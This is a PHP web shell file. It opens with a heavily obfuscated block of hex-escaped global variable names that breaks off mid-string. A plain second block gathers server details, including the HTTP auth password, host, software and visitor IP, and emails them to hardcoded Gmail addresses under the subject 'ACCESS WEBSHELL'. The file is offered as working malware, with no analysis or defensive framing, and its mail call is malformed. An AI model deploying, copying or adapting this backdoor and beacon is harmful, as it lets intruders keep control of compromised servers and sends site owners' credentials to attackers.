<?php ${"GL\x4f\x42AL\x53"}["z\x67\x74\x70u\x6e\x62"]="to";${"\x47\x4cOBALS"}["\x65ood\x71b\x71"]="t\x75j\x75a\x6e\x6d\x61\x69\x6c";${"\x47\x4c\x4fBAL\x53"}["iw\x67\x74\x79\x79\x72\x6e\x71\x6fn"]="izi\x6e";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6erh\x66\x74\x70w"]="s\x69z\x65";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x67\x6b\x66\x6ak\x72mj\x69"]="\x73k\x64";${"\x47\x4cOB\x41\x4cS"}["q\x6e\x6fwk\x65\x74wx"]="\x6d\x65\x6b\x69\x63\x69\x6e\x61";${"\x47L\x4f\x42\x41\x4c\x53"}["f\x6dbf\x6b\x63\x66\x6d\x6b\x70\x6b\x6c"]="\x65uy\x62\x72\x65";${"\x47L\x4f\x42\x41L\x53"}["\x67a\x6e\x6f\x62\x67\x69t\x66\x6d"]="\x70p\x6b\x63\x69n\x61";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75\x6b\x76\x6enp\x79\x75\x7a\x65"]="\x6c\x6fk\x61\x73\x69n\x79\x61";${"\x47L\x4fBA\x4c\x53"}["\x6c\x74\x76up\x66\x7a\x65k\x6e\x70l"]="e\x75y\x62rek\x77";${"\x47L\x4fBA\x4c\x53"}["\x70\x73c\x74\x6cps\x79\x6c\x67j"]="l\x6f\x6be";${"G\x4c\x4f\x42AL\x53"}["\x6c\x6c\x65\x63\x69\x6dhx"]="b\x75\x61\x74\x66";${"GL\x4f\x42\x41\x4cS"}["\x78\x7a\x6f\x7ark\x78\x62w\x74\x65\x68"]="d\x75\x6el\x75t\x65";${"GL\x4fB\x41\x4cS"}["\x6b\x6fj\x6a\x71\x76\x78\x64"]="\x64\x65t";${"\x47LOB\x41LS"}["\x68u\x77\x68r\x71q\x77"]="\x73\x74\x74";${"G\x4cOB\x41L\x53"}["t\x76b\x68\x6e\x78l\x61n\x6a\x75"]="t\x61\x6e\x67\x67\x61\x6ce";${"G\x4cO\x42\x41\x4c\x53"}["\x71\x6c\x6f\x73p\x63\x73"]="\x6bm";${"\x47\x4c\x4f\x42A\x4c\x53"}["u\x64pb\x72\x6b\x78\x71\x71"]="n\x61\x6da\x62\x61\x72\x75";${"\x47\x4c\x4f\x42\x41LS"}["b\x6fd\x6e\x6b\x63o\x6bb"]="\x66p";${"G\x4c\x4fB\x41\x4c\x53"}["\x68\x69m\x66\x6b\x65j"]="i\x64\x69";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63\x70\x63dug\x62"]="eu\x79\x62r\x65\x6b\x77";${"\x47\x4c\x4f\x42A\x4c\x53"}["y\x66\x72q\x73\x6e\x66\x65\x6c\x6c\x77"]="s\x70\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x67\x69\x65\x6e\x7a\x6c\x6d\x6a"]="\x6co\x65";${"\x47L\x4f\x42A\x4c\x53"}["w\x70\x75me\x6b\x72\x63\x76"]="\x67g";${"G\x4c\x4fB\x41\x4c\x53"}["\x6e\x77\x72\x73\x66ppy"]="s\x63d";${"\x47L\x4fB\x41\x4cS"}["\x64n\x64\x79z\x73k\x78\x77v\x71"]="\x69\x73\x69f";${"G\x4cOB\x41L\x53"}["\x70\x63\x6em\x

<?php
$random = rand(1000,5000);
$to = "muhrazky@gmail.com";
$ip = getenv("REMOTE_ADDR");
$ken = rand(1, 9999999);
$subj98 = " ACCESS WEBSHELL |$ken";
$email = "rootcyberpunks@gmail.com";
$tujuanmail = 'muhrazky@gmail.com';
$from = "From:";
$tot = $_SERVER['REQUEST_URI'];
$kon = $_SERVER['HTTP_HOST'];
$tol = $ip . "";
$pu = $_SERVER['SERVER_NAME'];
$ku = $_SERVER['SERVER_SOFTWARE'];
$qi = $_SERVER['SERVER_ADMIN'];
$pass = $_SERVER['PHP_AUTH_PW'];
$ad = $_SERVER['SERVER_ADDR'];
$h = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$se = $_SERVER['SERVER_ADDR'];
$msg8873 = "$se $pass $ku $ad $qi $pu $kon $tot $tol";
$path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$message = "URL: $path | IP Address :[ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($to, $email, $tujuanmail, $subj98, $msg8873, $from, "Halo heker!!!", $message, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>

